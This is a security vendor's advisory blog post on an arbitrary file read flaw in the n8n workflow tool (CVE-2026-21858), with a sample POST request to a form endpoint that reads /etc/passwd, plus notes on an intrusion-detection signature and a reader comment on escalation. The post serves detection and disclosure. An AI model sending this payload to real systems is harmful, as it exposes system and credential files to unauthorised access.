top of page
Search

n8n (Ni8mare) Content-Type Confusion - Arbitrary File Read (CVE-2026-21858) S

  • Jan 16
  • 1 min read


Application Details

n8n is a powerful, open-source workflow automation tool that lets you visually connect applications, APIs, and data to automate repetitive tasks, acting as a "digital assistant" for business processes.


Vulnerability

n8n is vulnerable to an arbitrary file read attack where an attacker could potentially access files through execution of certain form-based workflows.


Identification

A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system.


POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d

{
    "files": {
      "field-0": {
        "filepath": "/etc/passwd",
        "originalFilename": "product-spec.pdf",
        "mimeType": "text/plain",
        "extension": ""
      }
    },
    "data": [
      "not really important"
    ],
    "executionId": "not really important"
  }

Detection

By turning this into a traffic file and matching rule, we are able to detect arbitrary file read attempts to the application.


Coverage

Idappcom have created signature 8026715 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

 
 
 

1 Comment

Emily Jones
Emily Jones
Apr 10

I found this post really interesting because it highlights how a seemingly small issue like content-type confusion can turn into a serious security risk in modern automation tools. The “Ni8mare” vulnerability in n8n shows how important proper validation is, especially when dealing with file uploads and webhook handling, since attackers can manipulate requests to access sensitive data without even needing authentication. What stood out to me is how this flaw allows arbitrary file reads, which can then escalate into much bigger problems like extracting credentials, forging admin sessions, and eventually full system compromise.  It really shows how interconnected systems are today, where one weak point in an automation platform can expose a whole chain of services and data. I also…

Like
bottom of page